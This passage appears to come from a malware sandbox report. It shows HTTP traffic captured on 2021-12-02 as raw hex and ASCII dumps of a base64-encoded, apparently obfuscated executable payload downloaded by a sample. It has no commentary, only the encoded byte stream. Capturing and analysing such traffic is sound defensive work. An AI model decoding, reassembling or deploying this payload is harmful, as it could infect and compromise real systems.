4e 7a
                                                      Data Ascii: sYEY5LGA4QixgNzQsYDAzLGA4OSxgNzAsYDA4LGA4MCxgRjksYDc1LGA3NCxgMDMsYDg5LGA3MCxgMEMsYDM5LGAzMCxgNzUsYDBGLGAzOSxgNzAsYDA0LGA3NSxgMEEsYDM5LGA3MCxgMDgsYDc1LGAwNSxgMzksYDcwLGAwQyxgNzQsYEM1LGA4QSxgNEYsYDAyLGA4MCxgRjksYDEwLGA3NCxgMDIsYDg5LGAzMCxgODAsYEY5LGAwOCxgNz
                                                      2021-12-02 17:26:37 UTC1040INData Raw: 73 59 44 42 47 4c 47 41 34 4e 43 78 67 51 54 59 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 42 4c 47 41 31 4e 79 78 67 4d 44 59 73 59 44 67 77 4c 47 42 47 51 53 78 67 4d 44 45 73 59 44 63 30 4c 47 41 77 4e 53 78 67 4f 44 6b 73 59 44 41 34 4c 47 41 34 4f 53 78 67 4e 44 67 73 59 44 41 30 4c 47 41 34 4d 43 78 67 52 6b 45 73 59 44 41 31 4c 47 41 33 4e 43 78 67 4d 44 6b 73 59 44 67 35 4c 47 41 30 4f 43 78 67 4d 45 4d 73 59 44 67 35 4c 47 41 30 4f 43 78 67 4d 54 41 73 59 44 67 35 4c 47 41 30 4f 43 78 67 4d 54 51 73 59 44 4d 35 4c 47 41 77 4f 43 78 67 4e 7a 55 73 59 44 46 45 4c 47 41 7a 4f 53 78 67 4e 44 67 73 59 44 41 30 4c 47 41 33 4e 53 78 67 4d 54 67 73 59 44 4d 35 4c 47 41 30 4f 43 78 67 4d 44 67 73 59 44 63 31 4c 47 41 78 4d 79 78 67 4d 7a
                                                      Data Ascii: sYDBGLGA4NCxgQTYsYEZFLGBGRixgRkYsYDhBLGA1NyxgMDYsYDgwLGBGQSxgMDEsYDc0LGAwNSxgODksYDA4LGA4OSxgNDgsYDA0LGA4MCxgRkEsYDA1LGA3NCxgMDksYDg5LGA0OCxgMEMsYDg5LGA0OCxgMTAsYDg5LGA0OCxgMTQsYDM5LGAwOCxgNzUsYDFELGAzOSxgNDgsYDA0LGA3NSxgMTgsYDM5LGA0OCxgMDgsYDc1LGAxMyxgMz
                                                      2021-12-02 17:26:37 UTC1056INData Raw: 73 59 44 5a 43 4c 47 41 77 4d 43 78 67 4e 6b 55 73 59 44 41 77 4c 47 42 44 4e 79 78 67 4e 44 55 73 59 45 55 34 4c 47 41 32 52 69 78 67 4d 44 41 73 59 44 63 33 4c 47 41 77 4d 43 78 67 51 7a 63 73 59 44 51 31 4c 47 42 46 51 79 78 67 4e 6b 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 55 34 4c 47 41 34 52 69 78 67 4e 44 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 51 79 78 67 4e 6b 45 73 59 44 45 30 4c 47 41 34 52 43 78 67 4e 45 51 73 59 45 4d 77 4c 47 41 31 4d 53 78 67 4f 44 45 73 59 45 4d 32 4c 47 42 45 51 79 78 67 4d 6a 41 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 54 59 73 59 45 55 34 4c 47 41 33 51 53 78 67 4e 44 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 54
                                                      Data Ascii: sYDZCLGAwMCxgNkUsYDAwLGBDNyxgNDUsYEU4LGA2RixgMDAsYDc3LGAwMCxgQzcsYDQ1LGBFQyxgNkUsYDAwLGAwMCxgMDAsYEU4LGA4RixgNDEsYDAxLGAwMCxgODMsYEM0LGAwQyxgNkEsYDE0LGA4RCxgNEQsYEMwLGA1MSxgODEsYEM2LGBEQyxgMjAsYDAxLGAwMCxgNTYsYEU4LGA3QSxgNDEsYDAxLGAwMCxgNkEsYDAwLGA4RCxgNT
                                                      2021-12-02 17:26:37 UTC1072INData Raw: 73 59 44 55 78 4c 47 41 34 4f 53 78 67 4f 55 51 73 59 45 4d 77 4c 47 42 47 51 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 4d 55 45 73 59 44 4d 32 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 68 43 4c 47 41 35 4e 53 78 67 4f 54 67 73 59 45 59 35 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 45 4c 47 41 30 4e 53 78 67 51 54 67 73 59 44 55 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 45 51 30 4c 47 41 31 4d 53 78 67 4f 44 6b 73 59 44 55 31 4c 47 42 42 4f 43 78 67 4e 6a 67 73 59 44 4d 34 4c 47 41 77 4e 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 54 55 73 59 45 49 30 4c 47 41 31 4d 69 78 67 4e 54 59 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 51 7a 51 73 59 45 5a 44 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 33 4c 47 41 77 4d 43 78 67 4d 44
                                                      Data Ascii: sYDUxLGA4OSxgOUQsYEMwLGBGQyxgRkYsYEZGLGBFOCxgMUEsYDM2LGAwMSxgMDAsYDhCLGA5NSxgOTgsYEY5LGBGRixgRkYsYDhELGA0NSxgQTgsYDUwLGA4RCxgNEQsYEQ0LGA1MSxgODksYDU1LGBBOCxgNjgsYDM4LGAwNCxgMDAsYDAwLGA4RCxgNTUsYEI0LGA1MixgNTYsYEM3LGA4NSxgQzQsYEZDLGBGRixgRkYsYDA3LGAwMCxgMD
                                                      2021-12-02 17:26:37 UTC1088INData Raw: 73 59 44 41 32 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4e 69 78 67 52 54 67 73 59 44 4a 44 4c 47 41 31 4e 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 30 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 42 47 4c 47 41 34 4e 53 78 67 52 6a 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 34 4e 69 78 67 51 55 4d 73 59 44 42 44 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 47 4f 43 78 67 4d 44 45 73 59 44 63 31 4c 47 41 78 4d 53 78 67 4e 54 59 73 59 45 55 34 4c 47 41 30 4d 43 78 67 4e 44 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 59 73 59 45 55 34 4c 47 42 45 51 53 78 67 4d 6a 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 52 54 6b 73 59 44 67 79 4c 47 41 77 4d 43 78 67 4d 44
                                                      Data Ascii: sYDA2LGAwMSxgMDAsYDAwLGA1NixgRTgsYDJDLGA1NSxgMDAsYDAwLGA4MyxgQzQsYDA0LGA4NSxgQzAsYDBGLGA4NSxgRjUsYDAwLGAwMCxgMDAsYDhCLGA4NixgQUMsYDBDLGAwMCxgMDAsYDgzLGBGOCxgMDEsYDc1LGAxMSxgNTYsYEU4LGA0MCxgNDYsYDAwLGAwMCxgNTYsYEU4LGBEQSxgMjUsYDAwLGAwMCxgRTksYDgyLGAwMCxgMD
                                                      2021-12-02 17:26:37 UTC1091INData Raw: 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4f 44 55 73 59 45 55 30 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 31 4d 43 78 67 4e 6b 45 73 59 44 41 34 4c 47 41 32 51 53 78 67 4e 6b 55 73 59 44 5a 42 4c 47 41 32 51 79 78 67 4e 54 59 73 59 45 55 34 4c 47 42 42 52 53 78 67 51 6a 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4f 43 78 67 4e 54 41 73 59 45 55 34 4c 47 42 42 4e 53 78 67 4d 7a 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 78 4d 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 77 52 69 78 67 4f 44 55 73 59 44 68 44 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4f 45 51 73 59 45 55 30 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c
                                                      Data Ascii: AwMCxgMDAsYDAwLGA4RCxgODUsYEU0LGBGRCxgRkYsYEZGLGA1MCxgNkEsYDA4LGA2QSxgNkUsYDZBLGA2QyxgNTYsYEU4LGBBRSxgQjYsYDAwLGAwMCxgODMsYEM0LGAwOCxgNTAsYEU4LGBBNSxgMzEsYDAxLGAwMCxgODMsYEM0LGAxMCxgODUsYEMwLGAwRixgODUsYDhDLGAwMCxgMDAsYDAwLGA4RCxgOEQsYEU0LGBGRCxgRkYsYEZGL
                                                      2021-12-02 17:26:37 UTC1107INData Raw: 42 47 52 69 78 67 52 6b 59 73 59 45 4d 78 4c 47 42 44 51 69 78 67 4d 44 49 73 59 44 68 45 4c 47 41 35 4e 43 78 67 4d 7a 49 73 59 45 51 32 4c 47 42 44 4d 53 78 67 4e 6a 49 73 59 45 4e 42 4c 47 41 34 51 69 78 67 52 6a 41 73 59 44 4d 7a 4c 47 42 44 4d 79 78 67 4f 44 6b 73 59 44 52 45 4c 47 42 47 4e 43 78 67 4f 45 49 73 59 44 52 45 4c 47 42 47 4f 43 78 67 4d 7a 4d 73 59 45 4d 78 4c 47 41 77 4d 79 78 67 4f 44 51 73 59 45 4a 45 4c 47 42 43 51 79 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 6b 73 59 44 55 31 4c 47 42 47 4f 43 78 67 51 7a 45 73 59 45 4d 79 4c 47 41 77 4e 53 78 67 4d 44 4d 73 59 44 55 31 4c 47 42 47 4e 43 78 67 4f 44 6b 73 59 44 63 31 4c 47 42 47 4e 43 78 67 51 7a 45 73 59 45 4d 35 4c 47 41 77 4d 69 78 67 4f 45 51 73 59 44 67 30 4c
                                                      Data Ascii: BGRixgRkYsYEMxLGBDQixgMDIsYDhELGA5NCxgMzIsYEQ2LGBDMSxgNjIsYENBLGA4QixgRjAsYDMzLGBDMyxgODksYDRELGBGNCxgOEIsYDRELGBGOCxgMzMsYEMxLGAwMyxgODQsYEJELGBCQyxgRkUsYEZGLGBGRixgODksYDU1LGBGOCxgQzEsYEMyLGAwNSxgMDMsYDU1LGBGNCxgODksYDc1LGBGNCxgQzEsYEM5LGAwMixgOEQsYDg0L
                                                      2021-12-02 17:26:37 UTC1123INData Raw: 41 78 4e 43 78 67 4e 54 59 73 59 44 55 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 45 59 77 4c 47 41 31 4d 53 78 67 52 54 67 73 59 45 51 34 4c 47 41 78 52 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 54 55 73 59 44 45 77 4c 47 41 31 4e 69 78 67 4e 54 49 73 59 44 68 45 4c 47 41 30 4e 53 78 67 52 6a 67 73 59 44 55 77 4c 47 42 46 4f 43 78 67 51 30 45 73 59 44 46 45 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 44 67 73 59 44 68 45 4c 47 41 30 52 43 78 67 52 6a 67 73 59 44 55 78 4c 47 41 34 52 43 78 67 4e 54 55 73 59 45 59 77 4c 47 41 31 4d 69 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 31 4d 43 78 67 52 54 67 73 59 44 6b 33 4c 47 42 46 52 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 7a 4d 79 78 67 51 7a 6b 73 59 44 67 7a 4c
                                                      Data Ascii: AxNCxgNTYsYDUwLGA4RCxgNEQsYEYwLGA1MSxgRTgsYEQ4LGAxRCxgMDEsYDAwLGA4QixgNTUsYDEwLGA1NixgNTIsYDhELGA0NSxgRjgsYDUwLGBFOCxgQ0EsYDFELGAwMSxgMDAsYDhCLGA0NSxgMDgsYDhELGA0RCxgRjgsYDUxLGA4RCxgNTUsYEYwLGA1MixgNkEsYDAwLGA1MCxgRTgsYDk3LGBFRCxgMDAsYDAwLGAzMyxgQzksYDgzL
                                                      2021-12-02 17:26:37 UTC1139INData Raw: 41 31 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4e 43 78 67 52 54 67 73 59 45 4a 43 4c 47 41 35 4d 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 55 7a 4c 47 41 31 4e 79 78 67 52 54 67 73 59 44 5a 47 4c 47 41 35 4d 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 51 53 78 67 4e 45 45 73 59 44 55 32 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 5a 44 4c 47 42 46 4f 43 78 67 51 54 51 73 59 44 6b 79 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4e 44 51 73 59 44 55 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 4d 73 59 44 55 33 4c 47 42 46 4f 43 78 67 4e 54 55 73 59 44 6b 7a 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 5a 42 4c
                                                      Data Ascii: A1NixgODksYDQ1LGBGNCxgRTgsYEJCLGA5MixgMDAsYDAwLGA1MCxgNkEsYDAwLGA2QSxgMDAsYDUzLGA1NyxgRTgsYDZGLGA5MyxgMDAsYDAwLGA2QSxgNEEsYDU2LGA4OSxgNDUsYEZDLGBFOCxgQTQsYDkyLGAwMCxgMDAsYDgzLGBDNCxgNDQsYDUwLGA2QSxgMDAsYDZBLGAwMCxgNTMsYDU3LGBFOCxgNTUsYDkzLGAwMCxgMDAsYDZBL
                                                      2021-12-02 17:26:37 UTC1155INData Raw: 41 33 52 43 78 67 4d 44 67 73 59 44 59 34 4c 47 41 34 4d 43 78 67 4d 45 59 73 59 44 41 31 4c 47 42 47 52 43 78 67 4e 54 63 73 59 44 4d 7a 4c 47 42 47 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 46 4e 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 46 4f 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 46 51 79 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4d 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4e 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4f 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 51 79 78 67 52 54 67 73 59 44 67 77 4c 47 41 79 52 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 55 51 73 59 44 45 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 34 4c 47 41 34 51 69 78 67 4e 45 51 73 59 44 42 44 4c 47 41 34 52 43 78 67 4e 44 55 73 59 45 55 30 4c
                                                      Data Ascii: A3RCxgMDgsYDY4LGA4MCxgMEYsYDA1LGBGRCxgNTcsYDMzLGBGNixgODksYDQ1LGBFNCxgODksYDQ1LGBFOCxgODksYDQ1LGBFQyxgODksYDQ1LGBGMCxgODksYDQ1LGBGNCxgODksYDQ1LGBGOCxgODksYDQ1LGBGQyxgRTgsYDgwLGAyRixgMDAsYDAwLGA4QixgNUQsYDEwLGA4MyxgQzQsYDA4LGA4QixgNEQsYDBDLGA4RCxgNDUsYEU0L
                                                      2021-12-02 17:26:37 UTC1171INData Raw: 41 32 4f 43 78 67 4e 54 6b 73 59 44 59 30 4c 47 41 7a 4f 43 78 67 4f 54 45 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 4f 43 78 67 52 54 49 73 59 44 46 42 4c 47 41 30 52 53 78 67 4d 45 49 73 59 45 55 34 4c 47 41 35 4d 53 78 67 52 54 4d 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4e 43 78 67 4e 54 41 73 59 44 67 7a 4c 47 42 44 4e 69 78 67 4d 55 4d 73 59 44 55 32 4c 47 42 46 4f 43 78 67 4e 6a 51 73 59 44 64 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 54 51 73 59 44 67 31 4c 47 42 44 4d 43 78 67 4e 7a 51 73 59 44 41 35 4c 47 41 34 51 69 78 67 4d 54 63 73 59 44 68 45 4c 47 41 30 52 43 78 67 52 6a 67 73 59 44 55 78 4c 47 41 31 4d 69 78 67 52 6b 59 73 59 45 51 77 4c
                                                      Data Ascii: A2OCxgNTksYDY0LGAzOCxgOTEsYDZBLGAwMCxgNkEsYDAwLGA2OCxgRTIsYDFBLGA0RSxgMEIsYEU4LGA5MSxgRTMsYDAwLGAwMCxgODMsYEM0LGAwNCxgNTAsYDgzLGBDNixgMUMsYDU2LGBFOCxgNjQsYDdCLGAwMCxgMDAsYDgzLGBDNCxgMTQsYDg1LGBDMCxgNzQsYDA5LGA4QixgMTcsYDhELGA0RCxgRjgsYDUxLGA1MixgRkYsYEQwL
                                                      2021-12-02 17:26:37 UTC1187INData Raw: 41 77 4d 43 78 67 4f 44 4d 73 59 45 5a 47 4c 47 41 77 4d 53 78 67 4e 7a 59 73 59 44 41 35 4c 47 41 34 4d 79 78 67 52 55 59 73 59 44 41 79 4c 47 41 34 52 43 78 67 4e 44 51 73 59 44 64 43 4c 47 41 77 4d 69 78 67 52 55 49 73 59 44 41 7a 4c 47 41 34 51 69 78 67 4e 44 55 73 59 45 59 34 4c 47 41 34 51 69 78 67 4e 45 51 73 59 44 42 44 4c 47 41 34 4d 79 78 67 52 6a 6b 73 59 44 41 79 4c 47 41 33 4e 53 78 67 4e 6a 63 73 59 44 68 43 4c 47 41 77 4d 43 78 67 4d 30 49 73 59 44 67 32 4c 47 42 45 4e 43 78 67 4d 54 49 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 7a 55 73 59 44 4e 43 4c 47 41 34 51 69 78 67 4f 45 55 73 59 45 49 30 4c 47 41 78 4d 69 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4d 79 78 67 51 7a 6b 73 59 44 55 78 4c 47 41 34 52 43 78 67 4f 54 59 73 59 45 52 44 4c
                                                      Data Ascii: AwMCxgODMsYEZGLGAwMSxgNzYsYDA5LGA4MyxgRUYsYDAyLGA4RCxgNDQsYDdCLGAwMixgRUIsYDAzLGA4QixgNDUsYEY4LGA4QixgNEQsYDBDLGA4MyxgRjksYDAyLGA3NSxgNjcsYDhCLGAwMCxgM0IsYDg2LGBENCxgMTIsYDAxLGAwMCxgNzUsYDNCLGA4QixgOEUsYEI0LGAxMixgMDEsYDAwLGAwMyxgQzksYDUxLGA4RCxgOTYsYERDL
                                                      2021-12-02 17:26:37 UTC1203INData Raw: 41 77 51 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 79 78 67 4e 54 41 73 59 44 55 32 4c 47 42 46 4f 43 78 67 51 6a 6b 73 59 45 49 35 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 4d 7a 4c 47 42 44 4f 53 78 67 4e 6a 67 73 59 44 41 32 4c 47 41 77 4d 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 53 78 67 4f 45 51 73 59 44 6b 31 4c 47 42 47 51 53 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 49 73 59 45 4d 33 4c 47 41 34 4e 69 78 67 4d 6a 51 73 59 44 42 42 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 4e 69 78 67 4f 44 6b 73 59 44 68 45 4c 47 42 47 4f 43 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 54 67 73 59 44 59 30 4c 47 42 45 4d 79 78 67 4d 44 41 73 59 44 41 77 4c
                                                      Data Ascii: AwQSxgMDAsYDAwLGA1MyxgNTAsYDU2LGBFOCxgQjksYEI5LGAwMCxgMDAsYDMzLGBDOSxgNjgsYDA2LGAwMixgMDAsYDAwLGA1MSxgOEQsYDk1LGBGQSxgRkQsYEZGLGBGRixgNTIsYEM3LGA4NixgMjQsYDBBLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGA2NixgODksYDhELGBGOCxgRkQsYEZGLGBGRixgRTgsYDY0LGBEMyxgMDAsYDAwL
                                                      2021-12-02 17:26:37 UTC1219INData Raw: 42 47 4f 43 78 67 52 45 4d 73 59 44 63 35 4c 47 42 43 4e 69 78 67 4e 54 55 73 59 44 68 43 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 77 4f 43 78 67 4f 45 49 73 59 44 67 34 4c 47 42 42 4d 43 78 67 4d 45 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6a 67 73 59 44 49 32 4c 47 41 30 52 43 78 67 4d 7a 51 73 59 45 45 32 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 45 73 59 44 67 7a 4c 47 42 44 4d 43 78 67 4d 55 4d 73 59 44 55 77 4c 47 42 46 4f 43 78 67 4e 6a 45 73 59 44 55 33 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 54 51 73 59 44 67 31 4c 47 42 44 4d 43 78 67 4e 7a 51 73 59 44 41 33 4c 47 41 32 4f 43 78 67 4d 44 4d 73 59 44 67 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 5a 47 4c
                                                      Data Ascii: BGOCxgREMsYDc5LGBCNixgNTUsYDhCLGBFQyxgOEIsYDQ1LGAwOCxgOEIsYDg4LGBBMCxgMEIsYDAwLGAwMCxgNjgsYDI2LGA0RCxgMzQsYEE2LGA2QSxgMDAsYDZBLGAwMCxgNTEsYDgzLGBDMCxgMUMsYDUwLGBFOCxgNjEsYDU3LGAwMCxgMDAsYDgzLGBDNCxgMTQsYDg1LGBDMCxgNzQsYDA3LGA2OCxgMDMsYDgwLGAwMCxgMDAsYEZGL
                                                      2021-12-02 17:26:37 UTC1235INData Raw: 41 77 4e 43 78 67 4d 44 41 73 59 44 41 77 4c 47 42 46 4f 43 78 67 4d 30 4d 73 59 45 4a 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 31 52 43 78 67 4d 54 51 73 59 44 4d 7a 4c 47 42 44 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4f 43 78 67 4e 54 41 73 59 44 55 77 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 4d 33 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 4e 43 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 4e 47 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 51 7a 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 51 33 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 52 43 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 52 47 4c 47 41 34 4f 43 78 67 4e 44 55 73 59 45 55 7a 4c 47 41 34 52 43 78 67 4e 44 55 73 59 45 5a 44 4c 47 41 31 4d 43 78 67 4e 54 59 73 59 44 5a 42 4c
                                                      Data Ascii: AwNCxgMDAsYDAwLGBFOCxgM0MsYEJCLGAwMCxgMDAsYDhCLGA1RCxgMTQsYDMzLGBDMCxgODMsYEM0LGAwOCxgNTAsYDUwLGA4OSxgNDUsYEM3LGA4OSxgNDUsYENCLGA4OSxgNDUsYENGLGA4OSxgNDUsYEQzLGA4OSxgNDUsYEQ3LGA4OSxgNDUsYERCLGA4OSxgNDUsYERGLGA4OCxgNDUsYEUzLGA4RCxgNDUsYEZDLGA1MCxgNTYsYDZBL
                                                      2021-12-02 17:26:37 UTC1251INData Raw: 42 45 51 79 78 67 4e 7a 49 73 59 44 41 77 4c 47 41 32 4d 69 78 67 4d 44 41 73 59 45 4d 33 4c 47 41 30 4e 53 78 67 52 54 41 73 59 44 59 35 4c 47 41 77 4d 43 78 67 4e 7a 49 73 59 44 41 77 4c 47 42 44 4e 79 78 67 4e 44 55 73 59 45 55 30 4c 47 41 32 4e 43 78 67 4d 44 41 73 59 44 56 44 4c 47 41 77 4d 43 78 67 4e 6a 59 73 59 44 67 35 4c 47 41 30 4e 53 78 67 52 54 67 73 59 45 55 34 4c 47 42 42 4f 43 78 67 51 6a 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 45 59 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 45 30 4c 47 41 34 4e 53 78 67 52 6a 59 73 59 44 63 31 4c 47 41 77 4e 69 78 67 4e 55 59 73 59 44 56 46 4c 47 41 34 51 69 78 67 52 54 55 73 59 44 56 45 4c 47 42 44 4d 79 78 67 4e 54 4d 73 59 44 5a 42 4c 47 41 77 4f 43 78 67 4f 45 51 73 59 44 52 45 4c
                                                      Data Ascii: BEQyxgNzIsYDAwLGA2MixgMDAsYEM3LGA0NSxgRTAsYDY5LGAwMCxgNzIsYDAwLGBDNyxgNDUsYEU0LGA2NCxgMDAsYDVDLGAwMCxgNjYsYDg5LGA0NSxgRTgsYEU4LGBBOCxgQjAsYDAwLGAwMCxgOEIsYEYwLGA4MyxgQzQsYDE0LGA4NSxgRjYsYDc1LGAwNixgNUYsYDVFLGA4QixgRTUsYDVELGBDMyxgNTMsYDZBLGAwOCxgOEQsYDREL
                                                      2021-12-02 17:26:37 UTC1267INData Raw: 42 45 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 7a 4f 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 77 52 69 78 67 4f 44 55 73 59 45 46 46 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 43 78 67 4f 45 49 73 59 44 51 31 4c 47 42 47 4f 43 78 67 4f 45 51 73 59 44 52 45 4c 47 42 47 51 79 78 67 4e 54 45 73 59 44 68 43 4c 47 41 30 52 53 78 67 4d 7a 41 73 59 44 5a 42 4c 47 42 47 52 69 78 67 4f 45 51 73 59 44 6b 31 4c 47 42 42 51 79 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 49 73 59 44 55 77 4c 47 42 47 52 69 78 67 52 44 45 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 54 51 73 59 44 67 31 4c 47 42 44 4d 43 78 67 4d 45 59 73 59 44 67 31 4c 47 41 34 51 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 55 31 4c
                                                      Data Ascii: BEMCxgODMsYEM0LGAzOCxgODUsYEMwLGAwRixgODUsYEFFLGAwMCxgMDAsYDAwLGA1MCxgOEIsYDQ1LGBGOCxgOEQsYDRELGBGQyxgNTEsYDhCLGA0RSxgMzAsYDZBLGBGRixgOEQsYDk1LGBBQyxgRkUsYEZGLGBGRixgNTIsYDUwLGBGRixgRDEsYDgzLGBDNCxgMTQsYDg1LGBDMCxgMEYsYDg1LGA4QyxgMDAsYDAwLGAwMCxgOEIsYDU1L
                                                      2021-12-02 17:26:37 UTC1283INData Raw: 41 77 4d 79 78 67 4f 45 51 73 59 44 51 35 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 6b 31 4c 47 41 77 4d 43 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 6a 67 73 59 44 41 77 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 69 78 67 52 54 67 73 59 44 4a 47 4c 47 41 35 4e 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 44 55 73 59 44 45 34 4c 47 41 34 51 69 78 67 4e 54 55 73 59 44 41 34 4c 47 41 31 4d 43 78 67 4f 45 51 73 59 44 68 45 4c 47 41 77 4d 43 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 45 73 59 44 55 32 4c 47 41 31 4d 69 78 67 52 54 67 73 59 44 68 42 4c 47 42 47 51 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 51 69 78 67 4e 44 4d 73 59 44 45 77 4c 47 41 31 4d 43 78 67 4f 45 51 73 59 44 68 45 4c
                                                      Data Ascii: AwMyxgOEQsYDQ5LGAwMCxgOEQsYDk1LGAwMCxgRkUsYEZGLGBGRixgNjgsYDAwLGAwMSxgMDAsYDAwLGA1MixgRTgsYDJGLGA5NyxgMDAsYDAwLGA4QixgNDUsYDE4LGA4QixgNTUsYDA4LGA1MCxgOEQsYDhELGAwMCxgRkUsYEZGLGBGRixgNTEsYDU2LGA1MixgRTgsYDhBLGBGQixgRkYsYEZGLGA4QixgNDMsYDEwLGA1MCxgOEQsYDhEL
